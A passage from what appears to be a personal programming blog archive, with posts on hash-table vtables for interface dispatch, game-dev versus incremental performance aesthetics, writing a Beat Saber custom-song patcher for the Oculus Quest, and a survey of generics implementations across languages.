Of course, they often seem like extremely cursed hacks and to a large extent they are. They do things in a way nobody expects, and when they break they break at a layer of abstraction they aren’t supposed to break at, like your file descriptors mysteriously dissapearing. Sometimes though you can hit the layer of abstraction just right and handle all the cases such that everything is seamless and magic, I think good examples of this are rr (although telefork manages to be cursed enough to segfault it) and cloud VM live migration (basically telefork at the hypervisor layer).

I also like thinking about these things as inspiration for alternative ways computer systems could work. Why are our cluster computing APIs so much more difficult to use than just running a program that broadcasts functions to the cluster? Why is networked systems programming so much harder than multithreaded programming? Sure you can give all sorts of good reasons, but they’re mostly based on how difficult it would be given how other existing systems work. Maybe with the right abstraction or with enough effort a project could seamlessly make it work, it seems fundamentally possible.

Numderline: Grouping digits using OpenType shaping

2019-11-02T00:00:00+00:00

I recently worked on a fun side project to make a font that used font shaping trickery to make it easier to read large numbers by underlining alternating digit groups or inserting fake commas.

I wrote about it on the Jane Street tech blog since I started work there recently and I came up with the idea to help me visually parse tables of latency numbers for my job.

You can read the post here: https://blog.janestreet.com/commas-in-big-numbers-everywhere/

You can also check out the font demo and download site and the Github repo for the font patcher.

There’s one other large public technical document I’ve written off of my own site that I might as well link here as well, which is my documentation of how the Xi text editor’s CRDT works. Although it’s written more as documentation than as a generally accessible blog post, you may still find it interesting, it has lots of diagrams. You can read it here

Shenanigans With Hash Tables

2019-07-29T00:00:00+00:00

One reason to know how your data structures work is so that when your problem has unusual constraints you can tweak how they work to fit the problem better or work faster. In this article I’ll talk about four different fun tweaks to the concept of a hash table that I made in the process of using hash tables to implement interface method lookup vtables in my compilers class Java-subset compiler. The fact that I knew the contents and lookups of all the tables at compile time allowed me to heavily optimize the way the hash table worked at run time until the common case was just indexing an array at a constant offset! Even outside the context of compilers, I think this is an interesting source of inspiration for the ways you can tweak data structures for your purpose.

Background on vtables and interfaces

For object-oriented languages, compilers usually use “vtables” to implement method dispatch. This is when every object has a pointer to an array of function pointers corresponding to the different methods on that object. Each method has a fixed slot, with methods in base classes coming before inherited ones so that an object can be treated as its base class with the same offsets.

The problem is that implementing interfaces is harder since the vtable prefix trick doesn’t work. Java HotSpot implements interface method calls doing a linear search over a list of “itables” for each interface an object implements, then using inline caching and fancy JIT specialization to speed that up in the common case.

The simpler alternative is to make a giant table of every method signature present in the program (for Java that’s name and parameter types like addNums(int,int)), each class will have an instance of this table with the slots for methods it implements filled in (including ones inherited from superclasses), and most slots empty. Then for interface dispatch you can just use a fixed offset for the interface method signature: easy and fast. The problem is the size of each table scales with the size of the program, and so does the number of tables, leading to O(n^2) scaling, making this technique non-viable for large programs.

Hash vtables

Instead of using a giant fixed table, we can use a hash table from method signature to method pointer. Since every table doesn’t need to be large enough to fit all method signatures in the entire program, this solves the scaling problem. For simplicity we’ll use linear probing to handle the case when our hash tries to put two methods in the same slot: we put the colliding method in the next available slot.

However this is now much slower than simple tables. A simple hash table lookup with linear probing includes two operations that need to loop over the bytes in the signature as well as a probing loop:

struct TableEntry {
  char *signature; // assume signatures are strings for simplicity
  void *fnAddr;
}

void *lookup(TableEntry *table, size_t tableSize, char *query) {
  uint32_t queryHash = hash(query); // <- O(n) in signature length
  // look in the next slot if a collision bumped our target from its place
  for(;;queryHash++) {
    queryHash %= tableSize;
    TableEntry entry = table[queryHash];
    if(strcmp(query, entry.signature) == 0) { // <- O(n) in signature length
      return entry.fnAddr;
    }
  }
}

Why use queryHash %= tableSize instead of just indexing with queryHash % tableSize? I did that in the initial draft of this post, but then I realized it breaks when the initial hash is close to the maximum integer and probing causes queryHash to overflow to zero. That would have been a very evil bug since it would silently give the wrong result but only exceedingly rarely.

Hashing at compile time

First we’ll take advantage of the fact that we know which signatures are going to be used for each method call lookup at compile time, so we can do the hashing at compile time and then just compare the hashes when probing. This way we don’t even need to store the signatures in table for comparison, just the hashes.

struct TableEntry {
  uint32_t hash;
  void *fnAddr;
}

void *lookup(TableEntry *table, size_t tableSize, uint32_t queryHash) {
  for(;;queryHash++) {
    queryHash %= tableSize;
    TableEntry entry = table[queryHash];
    if(entry.hash == queryHash) {
      return entry.fnAddr;
    }
  }
}

Now our method lookup is simple enough that we can viably translate it to assembly and insert a version of it at every method call site. In the common case of no probing, branch prediction and out of order execution in modern processors should even make it so the cost over a normal vtable lookup is minimal!

Avoiding collisions with rehashing

The above approach has a problem, which is that we stopped handling hash collisions. A method call could resolve incorrectly if two different signatures hash to the same thing. According to my most frequently referenced Wikipedia page, at 32 bits for our hash we’re not safe from collisions in large programs, even if we use a strong hash function.

My solution to this is to keep a table at compile time of which hash value I’m using for each signature. When I’m adding a new signature to the table I append an additional integer before hashing, and if the resulting value collides with an existing hash, then I increment the integer and hash again until I get a value that doesn’t collide. This ensures that comparing signatures only by hash in the lookup is valid because hashes uniquely identify signatures.

Sizing the table ahead of time

In our above examples we need to pass in the table size to our lookup. If each class can have differently sized tables, we also need to store the size somewhere accessible, like index -1 from the vtable pointer. However loading the size means probably loading another cache line in serial, carrying a performance cost. The solution is to make all our hash vtables the same size.

The other problem is that the modulo operation is relatively expensive, having a latency of 20+ cycles. For the initial lookup we can fix this by also doing the modulo at compile time, then moving the modulo to the probing case of the assembly stub. We can improve the probing case as well by making the table size always a power of 2, and then using a bitwise AND with a constant mask (which has 1 cycle of latency).

In our compiler I computed a fixed power-of-2 table size ahead of time by figuring out how many method signatures the largest table needed to store, multiplying by an arbitrary factor of 4 to avoid collisions (and thus probing), then rounding up to a power of 2. I expect the size of classes follows a power law distribution so the largest class would scale with the log of the size of the program, making total table space O(n log n) in program size.

Probing only when necessary

My final idea was that when I was building the tables I could track which signature hashes ever collide in a table and get placed in a slot other than their home slot, and thus may need probing. Then for all the signatures which never got placed outside their home slot, I could just not generate the probing code at those call sites! Non-probing sites also don’t need to check that the hash is equal (it always will be) and can do the modulo at compile time, making them just indexing a table.

The final probing and non-probing assembly method call stubs look something like this:

; == X86 Assembly for general case with probing, call target in eax
mov eax, [eax] ; eax = address of object -> eax = address of vtable
mov ebx, 61 ; the initial slot index, hash % size
.callcmp:
mov ecx, [eax + ebx*8] ; get the hash at the current slot
cmp ecx, 1062035773 ; check if it matches the expected hash
je .docall: ; jump if it did match
add ebx, 1 ; if not probe to the next bucket
and ebx, 127 ; bit mask for computing i % 128 (the table size)
jmp .callcmp ; check the hash again
.docall:
call [eax + ebx*8 + 4] ; indirect call to the function pointer


; == X86 Assembly for case without probing, call target in eax
mov eax, [eax] ; eax = address of object -> eax = address of vtable
call [eax + 492] ; indirect call to the function at offset (hash%size)*8+4

Our arbitrary max table size expansion factor of 4 lead to only 0.13% of method call sites in our test program corpus needing probing, although larger programs would be less forgiving. This meant that in almost all cases my hash vtables emitted basically the same code as classic vtables would, except that the same vtables also worked for interfaces as well! However the tables being larger than classic vtables in the non-interface case mean they’ll be less efficient with cache space and so would be somewhat slower in practice.

Conclusion

I’ve never heard of anyone implementing interface vtables in this way, but I wouldn’t be surprised if there is prior art because these are all just simple insights you can have by thinking about how to specialize a hash table for this problem. I think LuaJit does some similar tricks for its hash tables where its tracing JIT can specialize on the hash value and optimize an index lookup plus bailing from the trace if the key doesn’t match.

According to my compilers class professor there’s a broad literature of optimizing the “giant table with all signatures” approach with heuristics for saving space by rearranging and merging the tables of different classes into the same space or re-using offsets across classes to make tables smaller. But the general problem is NP-complete so can only be solved heuristically. Interestingly I ended up with a kind of similar direction which re-uses offsets effectively randomly, but then includes a mechanism for handling the resulting collisions.

I hope you found some of these hash table tricks fun and came away inspired to think about how you might be able to modify a common data structure to fit your application better!

Two Performance Aesthetics: Never Miss a Frame and Do Almost Nothing

2019-07-27T00:00:00+00:00

I’ve noticed when I think about performance nowadays that I think in terms of two different aesthetics. One aesthetic, which I’ll call Never Miss a Frame, comes from the world of game development and is focused on writing code that has good worst case performance by making good use of the hardware. The other aesthetic, which I’ll call Do Almost Nothing comes from a more academic world and is focused on algorithmically minimizing the work that needs to be done to the extent that there’s barely any work left, paying attention to the performance at all scales. In this post I’ll describe the two aesthetics, look at some case studies of pairs of programs in different domains that follow different aesthetics, and talk about the trade-offs involved and how to choose which direction to lean for a project.

Never Miss a Frame

In game development the most important performance criteria is that your game doesn’t miss frame deadlines. You have a target frame rate and if you miss the deadline for the screen to draw a new frame your users will notice the jank. This leads to focusing on the worst case scenario and often having fixed maximum limits for various quantities. This property can also be important in areas other than game development, like other graphical applications, real-time audio, safety-critical systems and many embedded systems. A similar dynamic occurs in distributed systems where one server needs to query 100 others and combine the results, you’ll wait for the slowest of the 100 every time so speeding up some of them doesn’t make the query faster, and queries occasionally taking longer (e.g because of garbage collection) will impact almost every request!

A consequence of deadlines is that it’s not worth saving time unless you can save it in all cases. Things like caching often don’t help because if the item isn’t in the cache then you’ll miss your deadline. The easiest way to achieve this is to just do all the work every single frame and don’t keep anything between frames except for persistent state.

In this kind of domain you’ll often run into situations where in the worst case you can’t avoid processing a huge number of things. This means you need to focus your effort on making the best use of the hardware by writing code at a low level and paying attention to properties like cache size and memory bandwidth.

Projects with inviolable deadlines need to adjust different factors than speed if the code runs too slow. For example a game might decrease the size of a level or use a more efficient but less pretty rendering technique.

Aesthetically: Data should be tightly packed, fixed size, and linear. Transcoding data to and from different formats is wasteful. Strings and their variable lengths and inefficient operations must be avoided. Only use tools that allow you to work at a low level, even if they’re annoying, because that’s the only way you can avoid piles of fixed costs making everything slow. Understand the machine and what your code does to it.

Personally I identify this aesthetic most with Jonathan Blow. He has a very strong personality and I’ve watched enough of videos of him that I find imagining “What would Jonathan Blow say?” as a good way to tap into this aesthetic. My favourite articles about designs following this aesthetic are on the Our Machinery Blog.

Do Almost Nothing

Sometimes, it’s important to be as fast as you can in all cases and not just orient around one deadline. The most common case is when you simply have to do something that’s going to take an amount of time noticeable to a human, and if you can make that time shorter in some situations that’s great. Alternatively each operation could be fast but you may run a server that runs tons of them and you’ll save on server costs if you can decrease the load of some requests. Another important case is when you care about power use, for example your text editor not rapidly draining a laptop’s battery, in this case you want to do the least work you possibly can.

A key technique for this approach is to never recompute something from scratch when it’s possible to re-use or patch an old result. This often involves caching: keeping a store of recent results in case the same computation is requested again.

The ultimate realization of this aesthetic is for the entire system to deal only in differences between the new state and the previous state, updating data structures with only the newly needed data and discarding data that’s no longer needed. This way each part of the system does almost no work because ideally the difference from the previous state is very small.

Aesthetically: Data must be in whatever structure scales best for the way it is accessed, lots of trees and hash maps. Computations are graphs of inputs and results so we can use all our favourite graph algorithms to optimize them! Designing optimal systems is hard so you should use whatever tools you can to make it easier, any fixed cost they incur will be made negligible when you optimize away all the work they need to do.

Personally I identify this aesthetic most with my friend Raph Levien and his articles about the design of the Xi text editor, although Raph also appreciates the other aesthetic and taps into it himself sometimes.

The Tradeoff

Ideally it would be possible to follow both of these ideals simultaneously, writing code that does the minimal amount of work as fast as the machine can possibly perform it. In some cases this is possible but in most cases developers have more important things to do, or there’s a trade-off like caching slowing down the wost case. I’m conflating the axes of deadline-oriented vs time-oriented and low-level vs algorithmic optimization, but part of my point is that while they are different, I think these axes are highly correlated.

In practice when I see people set out to make a fast piece of software, depending on the project’s goals and their background, they tend to lean towards one aesthetic or the other. If every operation in your software never lags, then there’s often no reason to save additional work. If you’ve made everything in your system incremental to the point where everything is doing minimal work, there’s little reason to optimize the operations at a low level since they take negligible time.

That isn’t to say that people trying to make fast software shouldn’t understand both approaches. You don’t want to ignore either constant factors and the size of N in practice, or ignore the overall scaling and the quality of the algorithms you’re using. For each task you may use mostly one approach or the other, but choosing the approach based on the task rather than always using only one or the other is a valuable skill.

Case Studies

GUI Toolkits

In the olden days, GUIs were rendered with slow CPUs that couldn’t quite render an entire screen’s UI in one frame. This necessitated a Do Almost Nothing approach to GUI toolkits, where they kept track of the current state of the UI along with all sorts of saved computations like layout. Events would try to plumb minimal updates through the whole pipeline, touching as little as possible and then redrawing only the rectangle on the screen that actually needed to be updated, like the single new character you typed. But some updates like opening a new window wouldn’t be able to take advantage of this and might take multiple frames. This design is called “retained mode GUI” and is still around today in most GUI toolkits (with some extensions to use the GPU for scrolling and drawing). It’s still around because it works, it’s what people know, and it ended up good for battery life once laptops and smartphones arrived.

However, at some point computers and GPUs became powerful enough that it was possible to render an entire screen full of UI from scratch ever frame. This spawned an alternative approach called “immediate mode GUI” or “imgui” where instead of creating persistent widgets that stick around and can cache computations, you just call functions that figure out how a widget should look and then write data to buffers for the GPU. This is super fast and will always render in one frame provided you don’t render an absurd amount of UI. However, since it’s harder for an imgui to cache things they can’t easily do some things that retained mode UI’s can do, like render a long document of internationalized text scrolled to the bottom. All existing internationalized text shaping libraries are too slow to shape a long document in one frame, so immediate mode GUI libraries usually just don’t support internationalized text.

Text Editors

Sublime Text is a text editor that mostly follows the Never Miss a Frame approach. Basically every operation is instant because all the operations have been implemented very efficiently. However, some things like syntax highlighting don’t quite run fast enough to be instant at large file sizes so Sublime does have infrastructure for caching highlighting, and sometimes throws up progress bars when opening large files. Sublime makes trade-offs to use simple but efficient data structures by sacrificing performance in rare cases like editing extremely long lines. This architecture doesn’t always deal well with external code that isn’t designed to be instant though, plugins that communicate with slow compilers can sometimes temporarily hang the editor.

The Xi Editor is designed to solve this problem by being designed from the ground up to grapple with the fact that some operations, especially those interacting with slow compilers written by other people, can’t be made instantaneous. It does this using a fancy asynchronous plugin model and lots of fancy data structures. It tries to allow a native frontend for each platform despite the slowness of cross-language communication over JSON by only ever plumbing minimal deltas over the pipe, so the slowness doesn’t matter. It uses a fancy tree-based rope data structure to make even editing very long lines efficient. Many parts of this worked great, and Xi is extremely fast in many ways. The issue facing the Xi project today is that designing complex data structures and protocols to make every single operation incremental and asynchronous makes progress very slow.

An editor that leans into the Never Miss a Frame aesthetic even harder than Sublime Text is Makepad. It’s a work-in-progress editor that uses an imgui-esque custom UI toolkit to render everything, making heavy use of the GPU. Layout and highlighting for the entire file is calculated every single frame by highly optimized code. This will drop frames on rare 10k line files, but for all other files allows fancy things other editors couldn’t easily do like pressing alt to smoothly animate into an overlay of the functions in the whole file.

Compilers

Jonathan Blow’s Jai compiler is clearly designed with the Never Miss a Frame aesthetic. It’s written to be extremely fast at every level, and the language doesn’t have any features that necessarily lead to slow compiles. The LLVM backend wasn’t fast enough to hit his performance goals so he wrote an alternative backend that directly writes x86 code to a buffer without doing any optimizations. Jai compiles something like 100,000 lines of code per second. Designing both the language and compiler to not do anything slow lead to clean build performance 10-100x faster than other commonly-used compilers. Jai is so fast that its clean builds are faster than most compilers incremental builds on common project sizes, due to limitations in how incremental the other compilers are.

However, Jai’s compiler is still O(n) in the codebase size where incremental compilers can be O(n) in the size of the change. Some compilers like the work-in-progress rust-analyzer and I think also Roslyn for C# take a different approach and focus incredibly hard on making everything fully incremental. For small changes (the common case) this can let them beat Jai and respond in milliseconds on arbitrarily large projects, even if they’re slower on clean builds.

Conclusion

I find both of these aesthetics appealing, but I also think there’s real trade-offs that incentivize leaning one way or the other for a given project. I think people having different performance aesthetics, often because one aesthetic really is better suited for their domain, is the source of a lot of online arguments about making fast systems. The different aesthetics also require different bases of knowledge to pursue, like knowledge of data-oriented programming in C++ vs knowledge of abstractions for incrementality like Adapton, so different people may find that one approach seems way easier and better for them than the other.

I try to choose how to dedicate my effort to pursuing each aesthetics on a per project basis by trying to predict how effort in each direction would help. Some projects I know if I code it efficiently it will always hit the performance deadline, others I know a way to drastically cut down on work by investing time in algorithmic design, some projects need a mix of both. Personally I find it helpful to think of different programmers where I have a good sense of their aesthetic and ask myself how they’d solve the problem. One reason I like Rust is that it can do both low-level optimization and also has a good ecosystem and type system for algorithmic optimization, so I can more easily mix approaches in one project. In the end the best approach to follow depends not only on the task, but your skills or the skills of the team working on it, as well as how much time you have to work towards an ambitious design that may take longer for a better result.

Writing a Beat Saber Patcher for the Oculus Quest

2019-07-26T00:00:00+00:00

After trying out VR and Beat Saber at Ctrl-V and really enoying it, I decided to pre-order an Oculus Quest, the first standalone VR headset with 6 DOF head and hand tracking. As expected I really enjoyed playing Beat Saber and practicing to play more difficult songs, but I also ended up getting wrapped up in the Beat Saber modding community and developing a patcher for adding custom songs which has been downloaded 80,000 times. I figured out how to read and modify the Unity asset file format used by Beat Saber, learned C#, and wrote a patcher that could read in the game’s assets, modify them to add custom songs, and modify the APK in-place with the replaced asset files.

Early Discoveries

I started off by joining the Beat Saber Modding Group Discord chat while my Quest was still shipping, and chatting with the other modders who were eager to figure out how to add custom songs to Beat Saber on the Quest like they have with the PC version. I didn’t have anything to poke at myself yet but I could still chime in with ideas, and I created a Google Doc where I collated and documented other people’s discoveries, which I encouraged other people to edit and write things in as they experimented.

Over a couple days we figured out that Beat Saber was compiled with IL2CPP so modding the C# code would be tricky, but while the levels were stored in a different format than the PC game, they were stored in the Unity asset bundles present in the APK. Some people who had Unity modding tools installed that could read and modify Unity asset files looked at the assets and found the levels but the beat maps looked like indecipherable compressed or encrypted data, then through some digging in disassembly and deduction emulamer figured out that it was the same data types the PC version used for levels, just encoded with C#’s BinaryFormatter and then run through a DeflateStream.

With this information emulamer could convert PC beatmaps (maps of the patterns of blocks to slash along with the song) to the format that went inside the Unity asset. This could then be patched into an APK using a Unity modding tool like DevX. However, we had noticed that levels contained a signature field so we suspected this wouldn’t work on its own and it didn’t, but it turned out the demo version didn’t check the signature and this lead to the first successful test. We still needed to patch the signature check in the full version though, so I tried poking around in Binary Ninja but couldn’t get anywhere because the library with all the code didn’t have symbols for the function names in it. However people on Windows were able to use tools like Il2CppDumper to get symbols, and emulamer found the signature check and figured out an ARM machine code patch to replace the call to the verify signature function with a constant true. Elliot Tate used DevX and this knowledge to perform the first successful patch of the full game.

Figuring Out the Format

So we knew how to patch in custom songs, the problem was we only knew how to do it with closed-source Windows GUI applications like DevX, which wasn’t going to help us deliver custom songs to lots of people, and as a macOS user it wasn’t going to help me. We needed to figure out how to patch Unity assets ourselves. So I did some Googling and while I didn’t find any open source code that could modify Unity assets, I did find code that could read them. Now I just needed to extract an understanding of the asset file format from that code so I could write my own code that could read and modify.

I had heard about Kaita Struct which lets you write descriptions of a binary format and it will parse it into a tree in a nice IDE for you, but when I tried it I found the IDE really slow, cumbersome and kinda broken. The format was also very declarative and verbose and I found it hard to use. So I considered buying Synalyze It, which is a native macOS hex editor with similar capabilities, but its specification system seemed just as limited. Then (for some reason I forget) I realized that my version of Hex Fiend was many years old, and went looking for a newer version, which I found on their Github. In the changelog I saw that they had very recently added support for Binary Templates, which used Tcl (a fully featured programming language!), this was exactly what I was looking for!

So I gradually put together a Hex Fiend template for Unity assets by figuring out open source asset loading code and adding more fields, debugging by reloading the template in Hex Fiend and checking the parse in the tree view to see that the values made sense. Eventually I figured out all the parts of the file necessary to mod in custom levels. The Hex Fiend template was invaluable for making it really easy to write a quick parser and debug my understanding against the real files. It was also valuable later on when I could look at the output of my patcher in a pretty tree view.

I also needed to figure out how the audio files referenced by the audio assets were included. I was originally worried it would be complex because the built-in songs were packed into concatenated resources in the proprietary FSB5 format that I thought I might need to reverse-engineer. However upon further testing it turned out we could just drop .ogg files in the APK and reference them as offset 0 in a resource pack, and Unity could load them.

Writing a Patcher

Now I needed to write a patcher program that could take a Beat Saber APK and some custom songs in the PC JSON format, and produce an APK with the custom songs. I decided to use C# even though I had never used it before, because then I wouldn’t need to reverse-engineer the BinaryFormatter format used for the beatmap conversion, and it’s a nice enough language that works cross-platform. I also decided to structure my patcher as a library so it could be theoretically used in multiple different front ends, possibly including a C#-based GUI, as well as a command line tool and unit tests.

I started by writing a parser for the asset file format that parsed it into C# classes, but classes with a structure carefully designed so that they preserved all the information necessary to recreate the file exactly, while being straightforward to modify. This involved combining the separate directory and contents of the file format into a unified list of assets with no offsets, and ensuring that I saved amounts of padding in fields in relevant objects. Then I wrote the functions to write those classes back out to an assets file. I used a unit test to check that I could parse and then write out an assets file to a byte-identical one with no errors, starting with a small file and fixing bugs until I could round-trip the main assets file with all the levels.

After that worked I implemented loading the JSON level files and modifying my assets file data structure to insert the new levels into the existing “Extras” level pack. I also needed to copy the audio files into the APK and patch the binary to disable the level signature check. I needed to modify the APK file, but I didn’t want to use the normal method of unzipping it (APKs are just zip files) into a temporary location and then zipping it back up, so I used the standard library ZipArchive functionality which allowed me to modify the Zip file in-place.

After I got all this working and tested I just needed to write a small command line tool using the library I had written. This allowed me to patch my own Beat Saber for the first time and play my first custom level on my own Oculus Quest!

The Competition

All this time, emulamer had also been working on his own patcher with a similar approach to mine. He was making faster progress than me, and patched in his first songs somewhat before I did, and by the time I patched in my first songs his patcher had already been packaged into a Windows GUI by someone else and people were using it. It also supported things mine didn’t yet like cover art and a separate “Custom Levels” pack instead of just putting things in the existing “Extras” pack.

I persisted though because I was having fun and my patcher had some differentiating factors that I imagined could make it competitive with more work:

Emulamer’s code was by his own admission very hacky and he was just trying to get it to work as fast as possible and fix it up later.
Many parts of his patching process were controlled by a batch file and it didn’t work in-place on the APK like mine.
His patcher wasn’t structured as a library and it would be a bunch of refactoring to make it present anything other than one command-line interface.
I had been using DotNet Core on macOS from the start so I knew my patcher should work cross-platform, whereas his wasn’t designed to work on other platforms.

So I set out to add more functionality to my patcher to compete!

Catching Up

The first thing I did is add support for song cover art. I knew that emulamer’s cover art gave the game frame rate issues, which he assumed was because he didn’t resize textures and use texture compression. But when I looked at how the covers from the base game were stored, I noticed they didn’t use any compression but they did use mipmaps, and lack of mipmaps definitely seemed like it could explain the lag. Looking at the cover data in my hex editor I noticed a repeating pattern that got higher-frequency further into the cover, so I guessed that it was probably raw RGB data for all the mip levels concatenated together. I checked what my guess would predict the file size would be against the actual file size and it matched exactly. So I added support for covers with concatenated mipmaps of the size from the base game using ImageSharp. I let emulamer know about the mipmapping so he could reference the code and fix his frame rate issues.

Then I noticed a developer of SideQuest (a popular Electron GUI for side-loading apps onto the Oculus Quest) mentioning in the Discord that he was working on adding Beat Saber custom song support to SideQuest. I used the power of my patcher being a library to throw together a separate command line binary that used a JSON interface over stdin/stdout to provide an easy programmatic interface with more control. Then I included it in the cross-platform CI builds that raftario contributed, which used DotNet core’s ability to build a self-contained folder that includes the C# runtime and compiled program IL. I chatted with the SideQuest developer and pitched him on using my patcher because of the convenient cross-platform binaries with a uniform easy interface that could patch in-place.

The last major remaining obstacle to an easy cross-platform patcher was that after patching the APK needed to be signed using a Java-based JAR signer, requiring users to have 64-bit Java installed. Emulamer and I chatted about this and decided it seemed feasible to write a signer in C#, which he managed to do fairly quickly and let me use his code, and in turn I figured out how to speed up the signing by a lot and let him know how to improve the speed in his own patcher.

Soon my patcher was incorporated in a SideQuest release that people could use to (somewhat) easily patch custom songs into their Beat Saber!

Finishing Touches

At this point sc2ad had started working on my codebase and adding support for custom saber colors, removing songs, and custom packs. His code was still experimental, but I worked with him and did a lot of refactoring myself to integrate his code with how I wanted my patcher to work and eventually merged all of his work into master. As part of this process I wrote a new JSON-based command line with a new interface that allowed creating unlimited custom packs and organizing and ordering songs within them. The new code would then take an APK and synchronize the state with the songs you requested: adding, removing and rearranging the minimal amount necessary to update the APK quickly.

I let the SideQuest developer I talked to know these capabilities were coming and the SideQuest team developed an awesome interface for organizing your songs into custom playlists and synchronizing them. Soon the new version of my patcher was integrated into SideQuest and released to the world.

I had been scaling down the amount of time I spent working on Beat Saber patching, but as Beat Saber released updated versions I continued to update my patcher to be compatible with the new versions and improve its reliability. One of the Beat Saber updates removed the BinaryFormatter based beatmaps and switched to just JSON strings in the same format as the PC version with no signatures, which means eventually there was no reason my patcher needed to be in C# instead of my preferred Rust but I had already written thousands of lines of code so there was no point in switching.

Eventually things were working smoothly enough and I announced my intent to retire from Beat Saber patching and work on other things. SideQuest continued to be used by tons of people, with my patcher (downloaded automatically when people tried to use the SideQuest Beat Saber functionality) racking up 80,000 downloads.

The Next Chapter

Emulamer hadn’t stopped working on Beat Saber patching though, after I retired he continued plugging away and eventually released BeatOn. BeatOn is an on-device patcher than uses a C hook injection system by jakibaki to redirect asset loading to mutable Android /sdcard/ storage. This means that you can load new songs on your Quest and it doesn’t have to re-sign and re-install the APK so its faster. It also supports installing hook and asset mods for things like custom sabers and better swing score feedback. SideQuest also recently added support for installing BeatOn, accessing its UI from your computer, and copying your SideQuest song library to BeatOn. It’s basically completely replaced my patcher and is better in many ways, I’m glad for the progress and now use it myself.

Conclusion

My Beat Saber patching journey is now over but it was a fun one. I learned a bunch from figuring out how to mod a game in practice, as well as some C# programming. I also had fun collaborating with everyone on the BSMG Discord and figuring out how Beat Saber worked with them. Competing with emulamer was also a fun experience since I think we both benefitted from trying to implement cool things the other hadn’t and then letting each other take the ideas or code so that both of our patchers could improve, it was a very fun friendly casual competition. I think it was a good use of some of my summer, I had fun doing it, I’ve been playing Beat Saber nearly every day enjoying my custom songs and now can comfortably play at expert+ level, and many people have presumably also had fun with their custom levels through SideQuest and my patcher.

Models of Generics and Metaprogramming: Go, Rust, Swift, D and More

2019-07-14T00:00:00+00:00

In some domains of programming it’s common to want to write a data structure or algorithm that can work with elements of many different types, such as a generic list or a sorting algorithm that only needs a comparison function. Different programming languages have come up with all sorts of solutions to this problem: From just pointing people to existing general features that can be useful for the purpose (e.g C, Go) to generics systems so powerful they become Turing-complete (e.g. Rust, C++). In this post I’m going to take you on a tour of the generics systems in many different languages and how they are implemented. I’ll start from how languages without a special generics system like C solve the problem and then I’ll show how gradually adding extensions in different directions leads to the systems found in other languages.

One reason I think generics are an interesting case is that they’re a simple case of the general problem of metaprogramming: writing programs that can generate classes of other programs. As evidence I’ll describe how three different fully general metaprogramming methods can be seen as extensions from different directions in the space of generics systems: dynamic languages like Python, procedural macro systems like Template Haskell, and staged compilation like Zig and Terra.

Overview

I made a flow chart of all the systems I discuss to give you an overview of what this post will contain and how everything fits together:

The basic ideas

Let’s say we’re programming in a language without a generics system and we want to make a generic stack data structure which works for any data type. The problem is that each function and type definition we write only works for data that’s the same size, is copied the same way, and generally acts the same way.

Two ideas for how to get around this are to find a way to make all data types act the same way in our data structure, or to make multiple copies of our data structure with slight tweaks to deal with each data type the correct way. These two ideas form the basis of the two major classes of solutions to generics: “boxing” and “monomorphization”.

Boxing is where we put everything in uniform “boxes” so that they all act the same way. This is usually done by allocating things on the heap and just putting pointers in the data structure. We can make pointers to all different types act the same way so that the same code can deal with all data types! However this can come at the cost of extra memory allocation, dynamic lookups and cache misses. In C this corresponds to making your data structure store void* pointers and just casting your data to and from void* (allocating on the heap if the data isn’t already on the heap).

Monomorphization is where we copy the code multiple times for the different types of data we want to store. This way each instance of the code can directly use the size and methods of the data it is working with, without any dynamic lookups. This produces the fastest possible code, but comes at the cost of bloat in code size and compile times as the same code with minor tweaks is compiled many times. In C this corresponds to defining your entire data structure in a macro and calling it for each type you want to use it with.

Overall the tradeoff is basically that boxing leads to better compile times but can hurt runtime performance, whereas monomorphization will generate the fastest code but takes extra time to compile and optimize all the different generated instances. They also differ in how they can be extended: Extensions to boxing allow more dynamic behavior at runtime, while monomorphization is more flexible with how different instances of generic code can differ. It’s also worth noting that in some larger programs the performance advantage of monomorphization might be canceled out by the additional instruction cache misses from all the extra generated code.

Each of these schools of generics has many directions it can be extended in to add additional power or safety, and different languages have taken them in very interesting directions. Some languages like Rust and C# even provide both options!

Boxing

Let’s start with an example of the basic boxing approach in Go:

type Stack struct {
  values []interface{}
}

func (this *Stack) Push(value interface{}) {
  this.values = append(this.values, value)
}

func (this *Stack) Pop() interface{} {
  x := this.values[len(this.values)-1]
  this.values = this.values[:len(this.values)-1]
  return x
}

Example languages that use basic boxing: C (void*), Go (interface{}), pre-generics Java (Object), pre-generics Objective-C (id)

Type-erased boxed generics

Here’s some problems with the basic boxing approach:

Depending on the language we often need to cast values to and from the correct type every time we read or write to the data structure.
Nothing stops us from putting elements of different types into the structure, which could allow bugs that manifest as runtime crashes.

A solution to both of these problems is to add generics functionality to the type system, while still using the basic boxing method exactly as before at runtime. This approach is often called type erasure, because the types in the generics system are “erased” and all become the same type (like Object) under the hood.

Java and Objective-C both started out with basic boxing, and later added language features for generics with type erasure, even using the exact same collection types as before for compatibility, but with optional generic type parameters. See the following example from the Wikipedia article on Java Generics:

List v = new ArrayList();
v.add("test"); // A String that cannot be cast to an Integer
Integer i = (Integer)v.get(0); // Run time error

List<String> v = new ArrayList<String>();
v.add("test");
Integer i = v.get(0); // (type error) compilation-time error

Inferred boxed generics with a uniform representation

OCaml takes this idea even further with a uniform representation where there are no primitive types that require an additional boxing allocation (like int needing to be turned into an Integer to go in an ArrayList in Java), because everything is either already boxed or represented by a pointer-sized integer, so everything is one machine word. However when the garbage collector looks at data stored in generic structures it needs to tell pointers from integers, so integers are tagged using a 1 bit in a place where valid aligned pointers never have a 1 bit, leaving only 31 or 63 bits of range.

OCaml also has a type inference system so you can write a function and the compiler will infer the most generic type possible if you don’t annotate it, which can lead to functions that look like a dynamically typed language:

let first (head :: tail) = head
(* inferred type: 'a list -> 'a *)

The inferred type is read as “a function from a list of elements of type 'a to something of type 'a”. Which encodes the relation that the return type is the same as the list type but can be any type.

Interfaces

A different limitation in the basic boxing approach is that the boxed types are completely opaque. This is fine for data structures like a stack, but things like a generic sorting function need some extra functionality, like a type-specific comparison function. There’s a number of different ways of both implementing this at runtime and exposing this in the language, which are technically different axes and you can implement the same language using multiple of these approaches. However, it seems like different language features mostly lend themselves towards being implemented a certain way, and then language extensions take advantage of the strengths of the chosen implementation. This means there’s mostly two families of languages based around the different runtime approaches: vtables and dictionary passing.

Interface vtables

If we want to expose type-specific functions while sticking with the boxing strategy of a uniform way of working with everything, we can just make sure that there’s a uniform way to find the type-specific function we want from an object. This approach is called using “vtables” (shortened from “virtual method tables” but nobody uses the full name) and how it is implemented is that at offset zero in every object in the generic structure is a pointer to some tables of function pointers with a consistent layout. These tables allow the generic code to look up a pointer to the type-specific functions in the same way for every type by indexing certain pointers at fixed offsets.

